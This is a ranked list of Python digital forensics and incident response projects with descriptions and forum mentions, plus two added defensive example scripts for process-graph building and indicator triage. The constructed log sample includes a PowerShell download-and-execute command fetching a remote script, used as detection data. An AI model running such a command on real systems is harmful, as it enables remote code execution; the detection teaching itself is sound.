Top 23 Python DFIR Projects
-
ThreatHunter-Playbook
A community-driven, open-source project to share detection logic, adversary tradecraft and resources to make detection development more efficient.
-
Digital-Forensics-Guide
Digital Forensics Guide. Learn all about Digital Forensics, Computer Forensics, Mobile device Forensics, Network Forensics, and Database Forensics.
-
beagle
Beagle is an incident response and digital forensics tool which transforms security logs and data into graphs. (by yampelo)
-
Hunting-Queries-Detection-Rules
KQL hunting and detection queries for Microsoft Defender for Endpoint and Azure Sentinel (now Microsoft Sentinel): ready-to-use queries for Advanced Hunting, Custom Detections, Analytics Rules and Hunting Rules.
-
dissect
Dissect is a digital forensics & incident response framework and toolset that allows you to quickly access and analyse forensic artefacts from various disk and file formats, developed by Fox-IT (part of NCC Group).
-
lookyloo
Lookyloo is a web interface that captures a web page and displays the tree of domains the page pulls in, so redirects and third-party resource loads can be traced back to the page that triggered them.
-
misp-warninglists
Warning lists that flag MISP indicators likely to be false positives (well-known public IP ranges, popular domains and similar benign values) or that otherwise deserve a second look before being acted on.
-
LOOBins
Living Off the Orchard: macOS Binaries (LOOBins) is designed to provide detailed information on various built-in "living off the land" macOS binaries and how they can be used by threat actors for malicious purposes.
Project mention: My Boss Downloaded and Opened a .lnk File and Installed a Malware in His Device | /r/computerforensics | 2023-06-06
You should run a tool like loki for IOC scanning. This will identify persistence https://github.com/Neo23x0/Loki
If you're looking to learn on your own, try mikeroyal's digital forensics guide on Github. There's a lot of recommended resources there that'll speed you up. https://github.com/mikeroyal/Digital-Forensics-Guide
Project mention: My productivity app is a never-ending .txt file | news.ycombinator.com | 2024-02-19
You want Turbinia and DFTimewolf. Literally the tools built by the DF team at Google (the same team that makes L2T) purpose-built to do exactly what you're asking.
Project mention: RecuperaBit: A tool for forensic file system reconstruction | news.ycombinator.com | 2024-02-07
I’m excited to announce the release of Living Off the Orchard: macOS Binaries (LOOBins)!
LOOBins is a resource designed to help cybersecurity professionals and researchers understand and defend against the potential risks associated with binaries built into macOS.
https://loobins.io
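The beagle entry above describes turning security logs into a graph. The following is an added example written for this page to show what that buys an analyst; it is not beagle's code and does not use its API. The events are constructed JSON lines in a Sysmon-like shape (EventID 1 for process creation, EventID 3 for network connections), the ProcessGuid values are short placeholders rather than real GUIDs, and the Office and shell image-name sets are assumptions chosen for the demonstration.

```python
"""Build a process/network graph from log events and query it.

Added example for this page; it is not beagle's code and does not use its
API. The events are constructed JSON lines in a Sysmon-like shape
(EventID 1 = process create, EventID 3 = network connection); the
ProcessGuid values are short placeholders, not real GUIDs.
"""
import json
import ntpath
from collections import defaultdict

# Constructed sample log: a Word document spawning cmd -> powershell, which
# then calls out; plus one svchost whose parent was never logged.
CONSTRUCTED_EVENTS = r"""
{"EventID": 1, "UtcTime": "2024-05-04 10:00:01", "ProcessGuid": "p1", "ParentProcessGuid": null, "Image": "C:\\Windows\\explorer.exe", "CommandLine": "explorer.exe"}
{"EventID": 1, "UtcTime": "2024-05-04 10:02:10", "ProcessGuid": "p2", "ParentProcessGuid": "p1", "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "CommandLine": "WINWORD.EXE C:\\Users\\bob\\Downloads\\invoice.docm"}
{"EventID": 1, "UtcTime": "2024-05-04 10:02:31", "ProcessGuid": "p3", "ParentProcessGuid": "p2", "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c powershell.exe -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.45/a.ps1')"}
{"EventID": 1, "UtcTime": "2024-05-04 10:02:32", "ProcessGuid": "p4", "ParentProcessGuid": "p3", "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://203.0.113.45/a.ps1')"}
{"EventID": 3, "UtcTime": "2024-05-04 10:02:33", "ProcessGuid": "p4", "DestinationIp": "203.0.113.45", "DestinationPort": 80}
{"EventID": 1, "UtcTime": "2024-05-04 10:03:00", "ProcessGuid": "p5", "ParentProcessGuid": "p0", "Image": "C:\\Windows\\System32\\svchost.exe", "CommandLine": "svchost.exe -k netsvcs"}
"""


class ProcessGraph:
    def __init__(self):
        self.nodes = {}                        # guid -> process-create event
        self.parent = {}                       # guid -> parent guid (may be unlogged)
        self.children = defaultdict(list)      # guid -> [child guids]
        self.connections = defaultdict(list)   # guid -> [(dst ip, dst port)]

    def image_name(self, guid):
        node = self.nodes.get(guid)
        return ntpath.basename(node["Image"]).lower() if node else f"<unlogged {guid}>"


def build_graph(jsonl):
    g = ProcessGraph()
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        guid = ev["ProcessGuid"]
        if ev["EventID"] == 1:
            g.nodes[guid] = ev
            g.parent[guid] = ev.get("ParentProcessGuid")
            if ev.get("ParentProcessGuid"):
                g.children[ev["ParentProcessGuid"]].append(guid)
        elif ev["EventID"] == 3:
            g.connections[guid].append((ev["DestinationIp"], ev["DestinationPort"]))
    return g


def ancestry(g, guid):
    """Root-to-leaf chain of image names for guid. The walk stops at a parent
    that was never logged (log started too late, or a real gap) and guards
    against cycles in malformed data."""
    chain, seen = [], set()
    while guid in g.nodes and guid not in seen:
        seen.add(guid)
        chain.append(g.image_name(guid))
        guid = g.parent.get(guid)
    return chain[::-1]


# Assumed image-name sets for the demonstration query.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def office_spawned_shells(g):
    """Guids of shell processes with an Office application anywhere above them."""
    return [guid for guid in g.nodes
            if g.image_name(guid) in SHELLS
            and any(img in OFFICE for img in ancestry(g, guid)[:-1])]


def who_talked_to(g, ip):
    """Full process chain behind every logged connection to ip."""
    return [ancestry(g, guid) for guid, conns in g.connections.items()
            if any(dst == ip for dst, _ in conns)]


def render_tree(g, guid, depth=0):
    """Indented text rendering of the subtree rooted at guid."""
    conns = "".join(f"  -> {ip}:{port}" for ip, port in g.connections.get(guid, []))
    lines = ["  " * depth + g.image_name(guid) + conns]
    for child in g.children.get(guid, []):
        lines.extend(render_tree(g, child, depth + 1))
    return lines


if __name__ == "__main__":
    g = build_graph(CONSTRUCTED_EVENTS)
    roots = [guid for guid, p in g.parent.items() if p not in g.nodes]
    for r in roots:
        print("\n".join(render_tree(g, r)))
    print("office -> shell:", [g.image_name(x) for x in office_spawned_shells(g)])
    print("talked to 203.0.113.45:", who_talked_to(g, "203.0.113.45"))
```

The point of the graph over a flat timeline is the second and third queries: "which chain of processes is behind this outbound connection" and "which shells have an Office parent anywhere up the tree" are one ancestry walk each, and the unlogged parent of svchost shows up explicitly as a root instead of silently breaking the chain.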
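The misp-warninglists entry above is about screening indicators for known false positives before anyone acts on them. The following is an added example written for this page, not code from misp-warninglists or MISP: it compiles three constructed warning lists written in the JSON layout the upstream repository uses (name, version, description, type, list) and runs a handful of constructed indicators, of the kind an extractor such as iocextract would produce, through them. Only the "cidr", "hostname" and "string" match types are implemented; upstream also has "substring" and "regex" lists.

```python
"""Screen extracted indicators against MISP-style warning lists.

Added example for this page; it is not code from misp-warninglists or MISP.
The lists below are constructed samples in the JSON layout the
misp-warninglists repository uses (name, version, description, type, list).
Only the "cidr", "hostname" and "string" match types are implemented here.
"""
import ipaddress
import json

# Constructed sample warning lists (not real upstream lists).
CONSTRUCTED_WARNINGLISTS = [
    json.loads("""{
        "name": "Sample: public DNS resolver ranges",
        "version": 1,
        "description": "Constructed: resolver addresses that are not indicators",
        "type": "cidr",
        "list": ["8.8.8.0/24", "1.1.1.1/32"]
    }"""),
    json.loads("""{
        "name": "Sample: popular benign domains",
        "version": 1,
        "description": "Constructed: hostnames whose subdomains are also benign",
        "type": "hostname",
        "list": ["google.com", "cloudfront.net"]
    }"""),
    json.loads("""{
        "name": "Sample: hashes of empty files",
        "version": 1,
        "description": "Constructed: MD5 of a zero-byte file",
        "type": "string",
        "list": ["d41d8cd98f00b204e9800998ecf8427e"]
    }"""),
]

# Constructed indicators, as an extractor might emit them from a report.
SAMPLE_INDICATORS = [
    "8.8.8.8",
    "203.0.113.45",
    "update.cdn.cloudfront.net",
    "evil-google.com",
    "D41D8CD98F00B204E9800998ECF8427E",
    "ab56b4d92b40713acc5af89985d4b786",
]


class WarningList:
    """One compiled warning list; matching is case-insensitive throughout."""

    def __init__(self, data):
        self.name = data["name"]
        self.type = data["type"]
        if self.type == "cidr":
            self.networks = [ipaddress.ip_network(c, strict=False) for c in data["list"]]
        elif self.type in ("hostname", "string"):
            self.values = {v.lower().rstrip(".") for v in data["list"]}
        else:
            raise ValueError(f"match type {self.type!r} not implemented in this example")

    def matches(self, indicator):
        ind = indicator.strip().lower().rstrip(".")
        if self.type == "cidr":
            try:
                addr = ipaddress.ip_address(ind)
            except ValueError:          # not an IP address at all
                return False
            return any(addr in net for net in self.networks)
        if self.type == "hostname":
            # Match the name itself or any parent domain, label by label, so
            # "evil-google.com" does not match a "google.com" entry.
            labels = ind.split(".")
            return any(".".join(labels[i:]) in self.values for i in range(len(labels)))
        return ind in self.values       # "string": exact match


def triage(indicators, lists=CONSTRUCTED_WARNINGLISTS):
    """Split indicators into (kept, suppressed); suppressed maps an indicator
    to the names of every list that matched it, so the analyst can see why."""
    compiled = [WarningList(d) for d in lists]
    kept, suppressed = [], {}
    for ioc in indicators:
        hits = [w.name for w in compiled if w.matches(ioc)]
        if hits:
            suppressed[ioc] = hits
        else:
            kept.append(ioc)
    return kept, suppressed


if __name__ == "__main__":
    kept, suppressed = triage(SAMPLE_INDICATORS)
    for ioc, names in suppressed.items():
        print(f"suppressed {ioc}: {', '.join(names)}")
    print("kept for investigation:", kept)
```

Two details matter in practice and are deliberately handled: hostname lists must match by whole label (a lookalike such as evil-google.com is exactly the kind of indicator a substring match would wrongly suppress), and a suppressed indicator should carry the name of the list that matched it rather than vanish silently, so the decision can be reviewed.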
Python DFIR related posts
-
RecuperaBit: A tool for forensic file system reconstruction
-
Advanced Hunting queries every admin should use
-
LOOBins
-
Saving cached telegram messages from Edge
-
Lists
-
Report tips and note taking tips
-
please help, need disk recovery software free or cheap
-
www.saashub.com | 4 May 2024
Index
What are some of the best open-source DFIR projects in Python? This list will help you:
Rank | Project | Stars
---|---|---
1 | ThreatHunter-Playbook | 3,873
2 | Loki | 3,248
3 | IntelOwl | 3,114
4 | timesketch | 2,492
5 | yeti | 1,633
6 | Digital-Forensics-Guide | 1,343
7 | beagle | 1,250
8 | threathunting | 1,102
9 | hindsight | 1,020
10 | Hunting-Queries-Detection-Rules | 1,007
11 | dissect | 856
12 | CyberThreatHunting | 793
13 | ThreatIngestor | 786
14 | mac_apt | 718
15 | turbinia | 714
16 | lookyloo | 655
17 | atc-react | 571
18 | RecuperaBit | 504
19 | iocextract | 486
20 | misp-warninglists | 478
21 | PurpleCloud | 474
22 | dfirtrack | 464
23 | LOOBins | 387